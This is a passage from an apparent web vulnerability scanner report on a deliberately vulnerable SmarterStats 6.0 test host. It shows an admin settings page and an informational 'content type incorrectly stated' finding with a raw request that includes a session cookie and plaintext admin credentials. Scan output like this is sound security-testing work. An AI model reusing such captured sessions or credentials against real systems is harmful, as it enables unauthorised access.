gVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAVQEFkbWluaXN0cmF0aXZlRW1haWxzAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAXQWRtaW5pc3RyYXRpdmVFbWFpbHNUYWILZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTEPMugLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAABRAU3lzdGVtQWRtaW5pc3RyYXRvcgH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAAEEFkbWluaXN0cmF0b3JUYWILZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTMPMt4LAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAxAV2ViU2V0dGluZ3MB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAAA5XZWJTZXR0aW5nc1RhYgtklPiHCE61VFTrgRRe4mkfDXl3QxjZO+wxOsGYV3ev7iA=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1',''], ['ctl00$BPH$btnSave',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       General Settings
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
<div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           

<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
   <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Web Settings</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>System Administrator</span></span></a></li>
   <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Administrative Emails</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem3" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


       </div>
       <div id="Scrollable" class="ContentDiv">
           
<div id="ctl00_MPH_UpdatePanel1">
   

<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_WebSettingsTab" />

<div id='ctl00_MPH_WebSettingsTab' class='' >
           <span id="ctl00_MPH_WebSettingsTab">
<table id="ctl00_MPH_Table1" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lstRows">
                   <td id="ctl00_MPH_lstRows_Label" class="Indent Fixed">Rows per Page</td><td id="ctl00_MPH_lstRows_Setting" class="Setting"><select name="ctl00$MPH$lstRows_SettingDropDown" id="ctl00_MPH_lstRows_SettingDropDown">
                       <option value="10">10</option>
                       <option selected="selected" value="25">25</option>
                       <option value="100">100</option>
                       <option value="500">500</option>
                       <option value="1000">1000</option>
                       <option value="0">All</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstSkins">
                   <td id="ctl00_MPH_lstSkins_Label" class="Indent Fixed">Default Skin</td><td id="ctl00_MPH_lstSkins_Setting" class="Setting"><select name="ctl00$MPH$lstSkins_SettingDropDown" id="ctl00_MPH_lstSkins_SettingDropDown">
                       <option value="Default">Default</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_chkEnable">
                   <td id="ctl00_MPH_chkEnable_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkEnable_Setting" class="Setting"><input id="ctl00_MPH_chkEnable_SettingCheck" type="checkbox" name="ctl00$MPH$chkEnable_SettingCheck" /><label for="ctl00_MPH_chkEnable_SettingCheck">Enable users to override skin</label></td>
               </tr><tr id="ctl00_MPH_chkEnableAutoReminderPopups">
                   <td id="ctl00_MPH_chkEnableAutoReminderPopups_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkEnableAutoReminderPopups_Setting" class="Setting"><input id="ctl00_MPH_chkEnableAutoReminderPopups_SettingCheck" type="checkbox" name="ctl00$MPH$chkEnableAutoReminderPopups_SettingCheck" checked="checked" /><label for="ctl00_MPH_chkEnableAutoReminderPopups_SettingCheck">Enable automatic reminder popups</label></td>
               </tr><tr id="ctl00_MPH_chkResetGettingStarted">
                   <td id="ctl00_MPH_chkResetGettingStarted_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkResetGettingStarted_Setting" class="Setting"><input id="ctl00_MPH_chkResetGettingStarted_SettingCheck" type="checkbox" name="ctl00$MPH$chkResetGettingStarted_SettingCheck" /><label for="ctl00_MPH_chkResetGettingStarted_SettingCheck">Reset getting started</label></td>
               </tr>
           </table>
</span></div>
       

<div id='ctl00_MPH_AdministratorTab' class='' style='display:none'>
           <span id="ctl00_MPH_AdministratorTab">
<table id="ctl00_MPH_tblOptions" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lblSiteID">
                   <td id="ctl00_MPH_lblSiteID_Label" class="Indent Fixed">Site ID</td><td id="ctl00_MPH_lblSiteID_Setting" class="Setting"><span id="ctl00_MPH_lblSiteID_ReadOnlyLabel">admin</span></td>
               </tr><tr id="ctl00_MPH_txtAdminUsername">
                   <td id="ctl00_MPH_txtAdminUsername_Label" class="Indent Fixed">Username</td><td id="ctl00_MPH_txtAdminUsername_Setting" class="Setting"><input name="ctl00$MPH$txtAdminUsername_SettingText" type="text" value="admin" id="ctl00_MPH_txtAdminUsername_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtAdminOldPassword">
                   <td id="ctl00_MPH_txtAdminOldPassword_Label" class="Indent Fixed">Old Password</td><td id="ctl00_MPH_txtAdminOldPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminOldPassword_SettingText" type="password" id="ctl00_MPH_txtAdminOldPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr><tr id="ctl00_MPH_txtAdminNewPassword">
                   <td id="ctl00_MPH_txtAdminNewPassword_Label" class="Indent Fixed">New Password </td><td id="ctl00_MPH_txtAdminNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewPassword_SettingText" type="password" id="ctl00_MPH_txtAdminNewPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr><tr id="ctl00_MPH_txtAdminConfirmPassword">
                   <td id="ctl00_MPH_txtAdminConfirmPassword_Label" class="Indent Fixed">Confirm New Password </td><td id="ctl00_MPH_txtAdminConfirmPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminConfirmPassword_SettingText" type="password" id="ctl00_MPH_txtAdminConfirmPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr>
           </table>
</span></div>
       

<div id='ctl00_MPH_AdministrativeEmailsTab' class='' style='display:none'>
           <span id="ctl00_MPH_AdministrativeEmailsTab">
<table id="ctl00_MPH_tblAdministraativeEmails" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtProblemsEmailAddress">
                   <td id="ctl00_MPH_txtProblemsEmailAddress_Label" class="Indent Fixed">Email Address</td><td id="ctl00_MPH_txtProblemsEmailAddress_Setting" class="Setting"><input name="ctl00$MPH$txtProblemsEmailAddress_SettingText" type="text" value="administrator@example.com" size="40" id="ctl00_MPH_txtProblemsEmailAddress_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtSmtpServer">
                   <td id="ctl00_MPH_txtSmtpServer_Label" class="Indent Fixed">SMTP Server</td><td id="ctl00_MPH_txtSmtpServer_Setting" class="Setting"><input name="ctl00$MPH$txtSmtpServer_SettingText" type="text" value="vulnerable.smarterstats.6.0.host" size="40" id="ctl00_MPH_txtSmtpServer_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_chkProblemEmailsEnabled">
                   <td id="ctl00_MPH_chkProblemEmailsEnabled_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkProblemEmailsEnabled_Setting" class="Setting"><input id="ctl00_MPH_chkProblemEmailsEnabled_SettingCheck" type="checkbox" name="ctl00$MPH$chkProblemEmailsEnabled_SettingCheck" /><label for="ctl00_MPH_chkProblemEmailsEnabled_SettingCheck">Enable email notifications</label></td>
               </tr>
           </table>
</span></div>
       

</div>
   

</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/frmgeneralsettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

<script type="text/javascript">
function refresh() {
parent.document.location.reload(true);
}
</script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fAdmin\x2ffrmGeneralSettings\x2easpx?'); });
$('#ctl00_MPH_txtAdminOldPassword_SettingText').val('');
$('#ctl00_MPH_txtAdminNewPassword_SettingText').val('');
$('#ctl00_MPH_txtAdminConfirmPassword_SettingText').val('');
$(function() { SetTopTitle('General\x20Settings'); });
$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_WebSettingsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_AdministratorTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_AdministrativeEmailsTab"},"ClientCallbacks":{}}); });
modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Username","vcID":"ctl00_MPH_txtAdminUsername_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
modules['vmMustMatch_txt']='Must match {0}';
$(function() {$vc({"lt":"Confirm New Password ","vcID":"ctl00_MPH_txtAdminConfirmPassword_SettingText","VMs":["vmMustMatch"],"VPs":{"vmRequired":false,"vmMustMatch":"New Password ","vmMustMatchField":"ctl00_MPH_txtAdminNewPassword_SettingText"}},false);});
modules['vmOptional_txt']='Value is optional';
modules['vmEmail_txt']='Must be an email address';
modules['vmRequiredIfChecked_txt']='Must have a value if enabled';
$(function() {$vc({"lt":"Email Address","vcID":"ctl00_MPH_txtProblemsEmailAddress_SettingText","VMs":["vmOptional","vmEmail","vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkProblemEmailsEnabled_SettingCheck","vmRequired":false}},false);});
$(function() {$vc({"lt":"SMTP Server","vcID":"ctl00_MPH_txtSmtpServer_SettingText","VMs":["vmOptional","vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkProblemEmailsEnabled_SettingCheck","vmRequired":false}},false);});
//]]>
</script>
</form>
</body>
</html>


10. Content type incorrectly stated  previous  next
There are 61 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


10.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30101

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24BPH%24btnSave&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24txtAdminNewUserName_SettingText=weirdo&ctl00%24MPH%24txtAdminNewPassword_SettingText=LL12345&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__EVENTTARGET=ctl00%24BPH%24btnSave&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTYwMDgwNjA1Nw8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWDAICD2QWAgIBDxYCHgdWaXNpYmxlaGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ8WAh8CaBYCAgEPFgIeBFRleHRlZAIID2QWAgIBD2QWAgIBD2QWAmYPZBYCAgEPZBYCAgQPFgIfAmhkAgkPZBYEAgEPZBYCAgMPFgIfBAUHTWVzc2FnZWQCAw9kFgJmD2QWAgIHD2QWCAICD2QWBgIBD2QWDmYPZBYCAgEPZBYCAgIPDxYCHwQFCGhveXQubmV0ZGQCAg8PFgIeCl9fcmVhZE9ubHlnZBYCAgEPZBYCAgIPDxYCHwQFATFkZAIDD2QWAgIBD2QWBGYPEGQPFgFmFgEQBQlsb2NhbGhvc3QFATFnZGQCAg8PFgIfBAUJbG9jYWxob3N0ZGQCBA9kFgICAQ9kFgJmDxBkEBUDB1N0YXJ0ZWQGUGF1c2VkCERpc2FibGVkFQMFc3RhcnQGcGF1c2VkCGRpc2FibGVkFCsDA2dnZ2RkAgUPZBYEZg8PFgYeCENzc0NsYXNzBQxJbmRlbnQgRml4ZWQfBAUPU21hcnRlckxvZyBQYXRoHgRfIVNCAgJkZAIBDw8WBB8GBQggU2V0dGluZx8HAgJkZAIGDw8WAh8FZ2QWAgIBD2QWBGYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnR